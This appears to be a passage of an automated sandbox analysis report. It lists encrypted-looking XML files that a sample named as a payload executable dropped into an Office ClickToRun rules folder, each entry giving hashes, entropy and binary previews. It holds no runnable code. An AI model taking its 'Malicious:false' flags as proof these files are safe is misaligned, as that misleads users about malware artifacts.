                                                                                                      Preview:.<?......l.#w..;.....o...+..8....C....\0I..Q..Lb...9.%^..=B.....5....~.|..4rv.P!).].@.WB......f...q.VjF..l!.U..a.=(T...:..r..~..j4.lG}}...z.K.s3R|K..K..K..)~0$..t./E..=.'=.F..|g.hz.7(._..$cr...w.\.....|a..b.....m.8&...A..yL.t.......{X...E..B.3=...}AH.....h.y@hs.c...._9.....S;1....[..XO.c../..w.c0......u.}..=K{.D.lD...k5...|...}V...@H......3r.#MX..@RV..B...%_.4....hiq..>o.b..U.Jq.O.m."Yj..W..H{....9..L2#.0..C..('....?.J...ggrA....`P.R....0.1..Qp8..@3...n/w....z+..y.Dw.$.c.R..v.t..7..!..~.k.$o".S.5.'.._`.I>7.!...a.kQ..9.}i.[...s^.%.5.Rt..2.... .F.....).F.q`.5z..p_...=..l...`..M..5.W.{.fT...[.......N...eg%.3m&>x9..G.g.d..'?o.w;......*AL..(......."eO..9\.O..1.....|W:et.u..5a7+.......u..^*,_.....Z.<.r.../2P4...8Z......[.H..W...x...Qp.....x....."..w._..fVR.=2....|. l.RS.....$......:.5.K*.4.L....y}..r..}........S|....|..v..$eW?....Q.%'.3`5./.Z..S......../.}H2,J.....HnL.=...hW...i.]...<.c....'.R..$.( x..AS}..t.{....U>V...b.G.c..j.A.0. ...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702950v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1702
                                                                                                      Entropy (8bit):7.862687005392874
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:bMuxypPve4uAtePm69nqH1GX9JnsR289M4gEwD:bnAFe7+QWR2YM4E
                                                                                                      MD5:4F177CD72144530AC201D25DECD3D9E2
                                                                                                      SHA1:A794F35701E5CA752734B402DA3475A6C9CBEA4A
                                                                                                      SHA-256:6090DD2FD91E458BE3BAF65E6B15DFC7999E40730C20073CE9FC6507EA423C0B
                                                                                                      SHA-512:80AA6A7FF29F3B5F0593FC08C4BD46729E8DA7FD2DD1D3ED0A33F8A029A0E3113A76264A0685CE0BBABFAB2A0166E51D23FB9D2AC7E6EFF4EF8A7A2243E8B85D
                                                                                                      Malicious:false
                                                                                                      Preview:.<?c.&L...d....Q..n......Z.....}.{.lC.d.L...d....a.H..)]f..Sg......w..K......<...x...H...C6...2.<..(c....K.;....l0...C[h.o.(.../..~....Cko.vW= GO.p( ...W..=..M.#k.......].T#z.w....tV.......V...f..m.|..>.!.*..oN.VG...PQT.v}.y "...Wv....^.j.9....>[.6...&........1D...._<...GU.8H....nP.u.._.6.D..........%.R5......?.(S.|{..<}S..DU.k.X..w..!-.....V.....O.h....#.E....&..1.H..O7.Qk..D..5U..+f....o....|D...(.g...V..S....s.kxD..B.).vq.V.%....d....`[....~Dn....Spq.~.........~)=..Gxl.k^.|..9-..-.S.#."B$\O....+..p..o!.z=...mGkZ....4g.......Nn..W..BZ5.5.0+/.}....}.o..z.X.M........%...9..a%~..3.Fy......h...c]..s.@.w........y.....3..i.....Rb..9 B.A.~.{..&.6Ss.b.9.....~.R...n...q.C..Hi.Ts1.5........8...`..Q..l....F....]o......B4...*U.X.w.q ..*.....eZ.`.Q.V.#d..K.....4..O.c...jZDR.^m..4@.==z...}2.....4.w..h....j..z..k...L..Nd.s#.3.....|._5jq.....W....Y......^v.....3[~'........)...8...P...E..5w!D.^.(Lw.|.0....)....P9..`......`.O.U.l..._R^.:.B5JP...P.CY.B.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702951v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1739
                                                                                                      Entropy (8bit):7.8844044137126215
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NaHm3jWDBez4o7zRJ1rSYOXxe4ncvgJk3qwD:NQm3qex11se4ncUkv
                                                                                                      MD5:0081F53C211A8221578B7A9F354A7CE0
                                                                                                      SHA1:541DE40D49828DAF4AEFBB2D3CE9CDA0ADD2D0EF
                                                                                                      SHA-256:1EB77ABAC8D18204988E50DF71157C9524FD591971F6215421777E5BE161B5E3
                                                                                                      SHA-512:A74C62501D42A3EFD7B74BCEB304360B222BEFDFAE1E011F64D8DD87ED69652E35AB30BED89622AEC0F714A6FB89B6140F8E3A6A33619D19C95F852D836C6E12
                                                                                                      Malicious:false
                                                                                                      Preview:.<?{e.....&y..];2.e.&d.Y...V......s..-.^.?........]f.....m{{..........j...;.!.pSf..D.9.b8.@.x...L......DE....;....!..m..Z.........a6\.'.......I.X...;a.[.;?{.H7$~1..L.yl....E..v.e..n...X...)......r..I_.....!./Gl[.nd#..:.....}..).E..v....T.<.?D.h..o.c..?-.R?|_5(3$F...&.O!.L...S..:.....Y7...X...)...a.t..Q.^^?.A..y.p......c7.3I...<...E!......Q.}..8O.h4.........R.2Nr......k....z\...1Y.a..X...]vu.)......:LR%}*.../v.$..w...:w...|...K.....n....'..`.....)JH.._...I/..}....r....)H-..y...{..T..+.\{Y.Vz....O.1%..i.0`c.2....:....f.0B.5...T......N.)+..3z....\..[#..R....P.Jsh/.Y.....e....$.K.{.v...U.=Y..aj..S...C....M...f..2.B.N..3u.j..{.0..t..W2cXD?.....v@x..2#.`.h....L...h../..L.Py...F.?......|.g_N.q..o ...D +coP&......tE....0..5...l.IG....'..z.......`.....\...*.\....H%.*.$."m.I.%(..#1.`.d....U>^.x.....y{.FS.K.1..pf.W.m}.).$..So.L.r.P#N...ys|77l....%#.Y.@..mW.0..q8H.DD..k.,"..qR|#...s-...T.......3.?W.2R.d."..i.....D.1..).....Qv.........u...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703000v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1703
                                                                                                      Entropy (8bit):7.883195970938332
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:GcguBe7WdZtYzB3B/uwOX7lkeOyJEwND4OfKwwD:rguBe7mtSBZuwOLlkezEwND4Oyp
                                                                                                      MD5:DEA73AEBAAA30980D4D13CF50467F54B
                                                                                                      SHA1:552B7745BE270BC9B9675ACDC260347917525708
                                                                                                      SHA-256:DBAE5D2B63AFC1E239E7D273EF7ED167C3B092EE5C468B6C7D0AE9281DC4D82F
                                                                                                      SHA-512:3C96C51D1069E5FD1A1BE1189636235DB0C8A044E567F73F609EA692EC4F917D53EDE2B5414FA77BB85995DF1749A6D621FDA9630897D052B66CED22C59F2157
                                                                                                      Malicious:false
                                                                                                      Preview:.<?*.G.w.....J..i.y........*..J].N .J.d.$...=.Y..:.u.....n..22.P. ...hT..L.AP..o..].....[.<. Erp.i.Il.G..m1..,Cu)...QQ.f"Yg.....n..vU..3..j.P.F.NHG...3..c...h.<......0OP.........|....R..F.s..p..]5.3l.3n4'.0..v..x.......;@...>@.......o.9C....0.r,.a.p...-.[....n...R.<Q0...d..Q).o...0....7..%jG;.....i.k.m....N2J.{.*wG....H.F.2..........Hd.T.-.(.MB....$.BO .......Z.6V.......I.$y_;c.o..`0].n....|.Z..\.A.TlSC`..F..u#.a..Z~-....B.I.#v......Z*R[..q.w.W/.fU...>l......l."3.n+&..?.e....V........../'&.!?9....Pn..>../...6V..;9p. .kt.&...S..X.:m.....Ro.....~..^e.. .. ..>^....7.5...G^t...Q. .^k...M;m'f...=q).{......r.DYC.....N0i..l-.W.....+5....=.{.........!....:$..^\w...z..AB.....n.Q..^...].@..y......qU..A..W...C....i.....j......'.C..h.*.Rzo.o...~AL_.....T.c.*.....Z4...D<......M..w......8....n......q........Y4..A.\%..-V.,W.@.7.5e.............O...l..-..&P<.....p.>a....'.......s.+....NX...Jw....Z.W$.Hs./"...g.-...}..I..w.@-['.p.2.....O.M......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703001v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:, OEM-ID "<?\311\2", Bytes/sector 224, sectors/cluster 17, reserved sectors 47599, FATs 139, root entries 36770, sectors 26449 (volumes <=32 MB), Media descriptor 0xf1, sectors/FAT 15109, sectors/track 62292, heads 24, FAT (12 bit by descriptor)
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1740
                                                                                                      Entropy (8bit):7.873780436718596
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EMymeFrVxFEwv7Jcebg1ytP/ARQ31yrOW6AQtmSDaHwD:Yr2KdcEay1oQ357MSeM
                                                                                                      MD5:503F6F02F87CCBBCB55265EEA324D5D3
                                                                                                      SHA1:69CD1B7409862E4E1C376C93A0D018C223CD2DC0
                                                                                                      SHA-256:DA7CA4B893E9FD6427DF8EFC713DB02F06B8151DDA32237AC4C8AB2364423213
                                                                                                      SHA-512:7A528A983F8025CDA259E02CD8A10545C96BA01429575C0DECDD98496977084FFCEA5A3683372B400BD80E76680CFECBA1901F45E1DB6DDD8348A356693523AC
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..........Qg..;T..O.6...w.@....M+^.SB..i......vV...r.e;....~<....5 ._......6.'XO...t.c..., NC?.N..-(M.....f.i.a...t.d...ll..P|...`...>....N.V.D.vb.wy6.....O.D.....}6.5.p..b.........O...s.$.m..m LO..qa}....r4.....N(w.t.'m.....].+.....(8c...[:.....J.......Ir.$..-/.M....V........`..=....^.d.-..".#.5..........~.zf?.K..-=i.&jF.....&[...g..\q..y.".rm..v..S;..._.["C}e.....*^.].}....m..R........jMs.....<6....C..D.....T..$_.L....o<......lhg......+s..[j..\~9._...)NR=....j..s.D."U.:.rU.....E.........)..a.[z..6P..w.a.TWi.N..jh..1G.....Q#...T.......f.2..(y..'.WA{!y..rHnzW.F.|V..o......G..Q"k<.B2..\\}`.Ww%;..BAO.&....,.3..U.Bb2.B.iK.J.k.%.j...."..J.,.*...$....R.b.......N5IH"...+p..K.......#..`~`{..rF-..P..O...Wgk*...#.f.=.......i.zc).s.....V....,.L..w.... ...Gvg.!.nl|;c==.]N.....{...E........V,..a...b.0.z..-.dz.O @=...[.._-}./k..[.+#'a.C$x}..qM3.T..U(..]..9.S...^.].h....Z.]....9...N.W..$...~..S...4.r....A=...z...6C.d...F.%...DX..d.}...X.{B...i{...N.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703050v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1725
                                                                                                      Entropy (8bit):7.87560253067962
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+sd2mM0tUNpqYhTZZh9vUjERMim1iVBHzwD:rdRM+uZhFgERMMVB4
                                                                                                      MD5:DDAA0BFA774DF3E80615B8C4ED45AD09
                                                                                                      SHA1:124C1B5462FA78799097941020F2193C8821BC7C
                                                                                                      SHA-256:A6640ED6E125D8ADAB0EB91D689FD7D438892C1D91AB726608B6E8AD2A7DEA00
                                                                                                      SHA-512:93100AE424ED458AED0B2E708264F263142F6445A53E983B9A69936DD7AE3F197F155361543D27AA9768DAB24F12CB639D514CD176649D64AF0DC07A977C8808
                                                                                                      Malicious:false
                                                                                                      Preview:.<?..57.?.....k/..5BX......M.>2.....x/.w."....nZ.Bm...P....O5...#...w..)Yw..Q...cV3.*..w.-$........W.~..7v.......n.m$.A...0|{W{;p.(K0X...>^Z9.8...w._.....2......|6....{...UI.$N.......]..........NdL.......-'..k...B6T.&1B...xp.....\..t..M#.#....n....u0k...|f8.........#....z.+#.......*...........1].mo...2..oA.d...txp.F..w.2.so.k...1B(y~l\...b...Wk.6.Z...6....o...].>................oZ.;.......~. ..,...An........0.T .xe=^....P..u...8..z..cyVG].I....iP..t.C.L\....vb.m(B7>Mz..`.*......d...\.Z...f.(i...........m1"..~.SA..3....x.(X)........aNq.D2.L4]...*.Z&..]..f..U-..w..E..+.X.../M.>...F....?...\..<..k..>0I.x.&."R`k2@.!Sy.9...%..~'......../.<..|.#.T...N....>..Z........P.;f<.....Jd...(.V....(5...W.J....E...e./...u.9.P....w..W.c....X...swU.>.E;.B...T..ob..{...C.q`.......JX........x.?.."...z^.^.&...U.......UTEa....7......J^.c=...:....).\$..-.. .......v'..F..N......z../.....@.|...44u.........G.;..y.m....t.2%.8PPT.......Uv...t{...`n......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703051v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1762
                                                                                                      Entropy (8bit):7.88151756800286
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:3nH9gOPWsF7vy8EEidYKH/9w2kPdDiihrKtjN4Tgigq0cPwD:3ndPWsp18/9uPtjhrKtjN4oqk
                                                                                                      MD5:072E727D2655C20E8E5E70CC49747AF5
                                                                                                      SHA1:9E879D9A06E412AE20A918FC7C5431EAF9900EF6
                                                                                                      SHA-256:B4C9141A989ABE05FDE8E562EFF0EE74D0F40575FBE194F19300C7B683D150C5
                                                                                                      SHA-512:7503308E8D5104708B3BFFB5AF6B5F44CC02485D4867EC599511F0DA43CF6A0CA076688BCEFD35FEB8D226EC032C267904C1AED8DDA9E0308CC0F857C289EA54
                                                                                                      Malicious:false
                                                                                                      Preview:.<?F.!p....&[u.H.y.p_.S1.58U?.>...&.4\p8+.KWkY.E..v.....'._..4.E3.E....2...Q.................2......\....%...(...(AKb.do...fs.>...<:..a~...-.~^^..GL.!...-...u...]:B..q..xu..i8..$.K_\.F..QG1L:t$....@.....<..!..o..p..Nt.Rm..m...&8.t....`....S..O#{..N|....r....l.,;k 5...W.,..8......"..rU...b.EOm....D.s.q-1...WgC............]1....;_.......9.........b..m...A...w.3....2....l&t0.-&..........d.{{....>1X.Lp.....).^.F.....)q....#.{.J..]...T.&..X...G.0L..C8..lz.u.n...[<1n.hR}.bZ.Di./....PA....s.....R~.E.[..R...e.&..).T_.tb.....[)..Cv.h...&R.....LuF.e.U.p......#.......G@}n..J].....l..%..?...z..8..'...g...$.....1w..@...i#?.U.qdT..fk.+0..Y..#d.8f^y..1...4.'....m....:i.?.....KD....Ly...AR8.D.B`..M.....\..he.g.n...5%...J.... .x..2`U&..eC7.!w.b_6.6.+s1........<>.Yg....h...U.`.u....}q..o.n.#.9...i@{...m.f)X...d.g..<D.[.A..(.../L.RI..T.&./...'Z..U.....R."....N.0.P\..n.P....Y..t.....O.....C.Y.'].5.....8h3..E.A43C.<.8....V...wE...=H8...x!.p....5..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703100v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1690
                                                                                                      Entropy (8bit):7.878420487697005
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:E7Ns6bylMKxSuEez1dc5c5/UXChcRwqwD:sO1lMKxEadfU1Kf
                                                                                                      MD5:AD3F213F5AFB4074ACC9254FA976FBBB
                                                                                                      SHA1:1BE94D72BD7DBA7B643A0B3A26E06971F8BF48B8
                                                                                                      SHA-256:93FA4C9DE559D4979EC8586DEEED0084DD8C2CD35DA5EA954B4210D9CFCDC883
                                                                                                      SHA-512:AC2F7F8556A699239E56494BF51CEC37D48B91879960E3D20370FAD5424599B3C57F11B7CFC0DC3190FADA858F65AA61B7BA9D195C78ED0C47ECCE461F111CDE
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.8.q...Rr>.^.x..$`n.........]......=..n.S..S3..H.....>.....).5..M..<..pf.cIj &.A.......I.NX.fJ-.bRp..4....>..&.y.,Q~.8.{...-.c. .a...>.&%..;~.T"..}.m...*.4.$.c.d@.bw"...kL.....m..sW!n1..~...&.`.8....:..`T.$...J.kd.C..].....D>'3.yC..C..B.....a. 6....([.HN..3.+.0.!2%..4.....iH...F...)...Y.34Q.XP`....9.y.GW<....Sa...+...x.....!...?.RYQW.=]..9..9y....gV..`=..U. f.C........W...k....A._vT.F.N.=Vu.V...il`\..WI4..Y.....t...."V b.t...N...Leq.r....w..c..O..E.m.`..=.o6.R@.~....w..]....8.@..B...L...M...3wI.^..T.]....24..Z4>.]V......v1.....z...q.b...X...[7q...>.....h...fw.w..]}.y.WUC6..#>'..m.[e~..)..g..b..<V....b..Q...w.m.c...7B.....,?..hK.w._\......)8x.{.X.G\.0...k.u....Q<J.G_..f.s%}...7Kw...xq.'n~b.4.O..(E..d..D{..o..V..@ .M..a..;. ......@t;......~W/x.*]|..x...r..[.....9O...a...V.W......l+.f.[..R..,...P........d...!!a.h..d..^.....G.gEE.....h......i.TD.,.\.n.^.._...........ka..|......ul.......U.F..2K/.b.....t..g.d...Ma/.}...,.<...Au*.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703101v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1727
                                                                                                      Entropy (8bit):7.882850765596895
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:+BjlSyjNvNNgiMA4dIn9t+gIVPd3cH8hJO2O/JDwD:+jp5FaiMngYThJO2Oho
                                                                                                      MD5:E622446B688FB67D915C01D37F6BD475
                                                                                                      SHA1:7A217E4D40BF48FED89C4BE8AB0693DF5AF5A78B
                                                                                                      SHA-256:EF0AFC932E85633823E8A4891C8C181D28704B87FFF48E4643CD072BD1B5775B
                                                                                                      SHA-512:23B87173AE4602CA0D4431836961B6F1670DEA101D174399E0ABD9E387A3C66525E0CD918BE119DC85E512D175CFF826A9C60664AEED3AE02F096F6384F5324A
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.k..eVo(;.p....+I..95%"+u....'%=Z.....^.J..l.....k.c...\.Kh...6..p......... .Xk..a..#].NzI..D.?]......J....x.7.d8.)Oo..G@D..=.tM..:.\.}.5.B..O2...".U.........}..'.K.yCG>..]....+7.....|E*..:j&.{.^..>..*....MLV..9vy.-.Kn.....qL..W.\...>.)...P..@EJ.>w..>...Q.L...Gq...2f=/..nA.5.#t.:.......s..\...#$.....e..Ou...GF[.UQ.<....u.i.....t..7.W.A..wK......U...Yc.TH..;........wnI.o&.F...l....W....l...v-..[..$......E....%.....:}ze..J.v`k#.c(.9D..`.i..{"r...........or..K).L..u.7.................H.t.#}}...'....y+....2..-..R..W..H167..rm..X.k.K.X.....".!.X.k......{..4..N3..S.6.v...!X.N...T....D.4..{..V...R..%.aP!....Q...?.P/.S3%..w.z.nU.+L......Im....DG.OJ*.0n...3c....6../2...DR.J.F(...].<.........g.B.u.P.....T.M6(0.c..|j$-b.....B.KwC...(ZR...A.j.e.9..r.................=m.}.K...z]l.....Z.G>~......Yb.J...)..o..q....RP4r yPX.c.0B....9..u....'...f...`.../.......o.S(....L.<..>...4..SKx]..8.WMua.....1....T........3...:..Cm9../k...~..J.9..m..]..{.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703150v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1708
                                                                                                      Entropy (8bit):7.867030799416571
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:X+ytdjBm8iek01HMhMrh06lzFOM/VSQdz0X/srEpTowD:PZm8NqhMrhd9FLtSCmkEpV
                                                                                                      MD5:07A92604F79C2C5E29514FC457C87737
                                                                                                      SHA1:A9589370274294D8CFCDF99B069AFA7F27BB4DCF
                                                                                                      SHA-256:441E7611F59F13D2115DE8F8F702AEAD881092A746BACD2696074ECDD05D894C
                                                                                                      SHA-512:01481DC47848233C1E92E86B15292637B91E46F2D581747BBDDDC52F437DF4F51592215F84EDC3B3FC1EFA72D3924AFC9E3141E18E7C1F0DE6A10FC1A794D704
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.......a....%I..s.,29.ew{w.*_2.tM....[.X^.....)....lI..6.d.w...0.F..Q...$.%.Y...z]....#.......5.Z...0S.....g/|.3..2.!..X.W...g...1Q.~.E...8[..>............l ...D]u...vf.....>../'.*RhHU..,2...xLA.MT.....F.-Q.8.....R.O.v.e.pC}.Z..c. |?..mU.....j...k..qWmK.H'..v'....7...=..:....1.-.rG...U.9:m=|fjH.H.r..6.p..{.....3jMO.....(l...Q..Q.. ....C.f..go..ah.,..\?...z.`..*`>n_.;..*.X8SF(..L5.9v/..[Ut............$2....y.......F...U@;..]Q.../.3...E.}...H.I.X....G.....~.m...e9e.p,.o....Oy-.7..x.$M..z....8... ....(..A.1..........C..H8..6.....c._9.`......{._o.A..\D@#...!..."z.;X0.......$Sq.:....5~../d/...+..._-x.dU..kS.=uI...~.-..........\ ,..q|...i.T...,(.6....QD...m.F(6#b..d.........d.D.....g...4....6...d.......[.1..3=t.P.W#..A...~5...L..=6../.c~k..^.....|yS. JnC.=..=......v#hA..'. .|..iu..:'"M?......,....m..0S-.G.L. .v...R....y.j...^...8@.....h).$.M...s['|.~..Eue@%...!.f..T[..... ...Z8*..BK@*F....b...?..]..TyQu.W........-.....vBi....MdIW.X.k

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703151v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1745
                                                                                                      Entropy (8bit):7.8891906006073516
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nJjIBKvxLT7JzvdBYaIHWx/yHSwCy4LJmJwwD:JjltFvzYaI2ZQSwCy4LJ0
                                                                                                      MD5:38943AF0E0FE5654C5773DD06F89C802
                                                                                                      SHA1:1E57D110C5258412DD45FF42E8414F86CFEF7EB3
                                                                                                      SHA-256:46EB2670CD37AF5E04E1158A21CCB0DA66B93EC5F472706E4C0E639D94788E6E
                                                                                                      SHA-512:6D0ED96CCE1E827D76656E85CA84F7B1BB71B7254DF199D52AED1693D58A0A01F631ED81F2EF5E56BBC668E0AF15BCC6D8C76F1008A2C15B659EF76F21631111
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.u.ht2...a.5.....D.2.S..L...}.f...s.Pq.A.dc-...-../}..2..c.....w...f..~2/.....a32.t...o........SY]sNZ./.}.!..A.Zc.9^L.....'...X..2.........y.g.Z..;..VEZ/^.;.d.......X.*..u..$..u....p.KS.q... .br.jf.(.U.$o..h....K}pR.a1...a.R4....3.q.^N.Q..>*..<.`.u........x..`./.V'...Q.@.N..Kj.`..3.G.*E#_.,.xw..yb.a p.#......Qe..Am.tk....X...l|.....u..P.Q(.pO/...Y$.....U9..{..a..v|....C..yw.m.|..x*.!>q..GV.V.\~..s.X...{......(.Xb+...Y.<.......E..P.._..Z..r..A.....!....\.".Mr7......&.q....c6.....R......tj..K2..D6...}.?.om.:...:sw......j.y4...\.bD..cc.f...H...n...,..]..Y..L..k..t.4.C.ZN..N^M..h...../y....0...n .q....c\.../..9&......T.%.....k..y...[../..R...~..;....8l>&..,_.....5.1(.Rq.Df.....U.#....j.mB0.Hy..|='..T'.......hPS...w....(.......'J.j.....&.!..b.yVun..(4.Ks7..@u.T:..Z.rb0.N%.`DL.........I...T.42..;.q...'...k....3..b.+...j.O.9..pw..x.[.yU.P..C*...,>.Lf..;`....Fu.O].._.....o.:}....2....;i...8..B...0.IW.....\B.\..F.2.'..k.:...._.':H.t..=.C?

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703200v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1696
                                                                                                      Entropy (8bit):7.861121113965505
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EkVQffPoVjyjDZOvPZnr+HVZRd4HpqTSMa/ZEKsHwD:ZVQffPo5qMVr+HVZR2Hpq2TBlsM
                                                                                                      MD5:673F84750824DA7A5888869E23FE3262
                                                                                                      SHA1:0BA264285C3AFF00D62ABB2C2E72F600AF2194CE
                                                                                                      SHA-256:928FFD5BBB0030FCBA7B6B534384C99108E77E7462451FBF067CA7A8C4AA2417
                                                                                                      SHA-512:1F604835253045EED45B70B9CF0929E7F44DDF5399F1939245A8EED5CE1CF3D5E692C3449EDCFE582B75B0AD8BC5DB9F47E007486B714CEAE5C76C19AA56A003
                                                                                                      Malicious:false
                                                                                                      Preview:.<?.D...F...].@D..f..q.5B.A&.>....)z.(..U...S=oeH.].K.EZs.0...@Y.`.T.. ......yXCj.~.f]i.Y..SBC.G.J6..B..8.6.......C......gQ.c.(9..#N..dk.;.c..ZQ.n>e..[...Aq.su....b....._.[..k.....q.c......[.5<v..~..$..........HB.Z.u;...k......U.s....m..KFK9...U.a.y.p.....-.T..#.b*W....,S.n...>{D.=C.l...g.R.<^R.7...i.a..;8.Y...~..G.%{..U....$MB.+..gz.!.....V|..+[..r..q...A..j..B...]o.V2WE..?...\...@....L....^.y3O".....7*.B..{A.'...Q.YPR|.)P.gZ<.%|.y.....2.n=...fN.0.L{.s..X.2....0..p...|&E........@.d.s.....AIt..0..n.......z.6q.. ..W.<....W...VR<.QYe..p.Y.{<.l....U8g..sT..ph2V..[....O...K....2.{.$.&..O.R..-$|W'..(4....A.j.t...Y(..p.t.?Z.j..m...B...l,.?&....J...o.A...U..h....W.r;.1...y.}...ZOU....4....o..7.=...*r.....^MO..e..d.U4J.'.i....\zv9..|...VY*6..9.=.h-.X....Nn.......j..!.|....?..R...<...!..2.$.]W.5<.....&m..YGV.,...}.AJ!...T)....z..._..V"D.w.....!R..vF.."...+.|6..v.s...M..V@..3...keK.il.c.VSv.....xT..Ks.x.DU{,.K..)f.Z.<\1..s....4...hEq..Y......MT.FG.24

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule703201v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1733
                                                                                                      Entropy (8bit):7.883143084423653
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:OAjaPVMp3vQubAlUnL3mFouEVo99oVY4/w8xxovXDBXHzGHSsCAQzYj4qhv6bD:lePVw4nWrXoIOIPxovTF0AzYUqhwD
                                                                                                      MD5:AD8CC897AD135511C2CBAE40298FA018
                                                                                                      SHA1:6B8E87199ED0B273F5321A087E1F721BB38AFCEC
                                                                                                      SHA-256:01937F5F2835B1E5F0B67C39A839FE894A1FD2754073A8CF45F13A631638ADBF
                                                                                                      SHA-512:96735F90444128B299F4610D125F18D3D5057C3BD040655AF912CB0905DBB51B8132947A980A2E555F94016F08F345D3A8CD1FEE455D2FF5E913284F04C8AFB7
                                                                                                      Malicious:false
                                                                                                      Preview:.<?|@./..n.N..<.......5y..c.C.C ...>....Y...p~]+.....>...w.D..........6.C....m..X....J.....SCE..t..'.zb.......J...,...r?T>.U....b....%..'.y}O.x....K.C..T....q...S. ..#......+K.#..i..@.t..x.h.....B........M.@..Z..^. ..........BDm...._M..m......h'b...$....bc...'.-~.....Jc....]ls.P..Z.pQ.y.....St#.pV_.>..b..Qr..~$.k.Z%...!.....s.H^...[....L...H......Eo+I...wk_l.pg..K..4{.Y.^hz;.Z_....09...y>.{.P.7.$....@.d.....)...|.N...f....(.eA.j.\....40.*.x..Y`..!Z@.G.Q.v=.FLf)..........b..4...e.N...).{t..,F..(....)....Dt....6....'v."u...`U.i.......>x.2..{.CcT..L..Tq....;k.....m.......,...<..n'...W.E.....9 ..>D~?.JL.....~..`....1.{..5.....j...1..+...|.............m".:$.F......)..g...(...V.X.M........z.8....xA...)..*.x...[.43...B...U.`.b'N.%H..,...^.p@J.K....9]..<...O..7.........D...;S.....@..h..f0u.t....)..mu.....'..^x.............c@@R.6Ya.N.v.e.3.......|.R...?...4ToD../....Zm.o."?8@k.l..e?...9..d.5g...ujQ;..{.!._J.....j.'f`.m............@3l/....T."

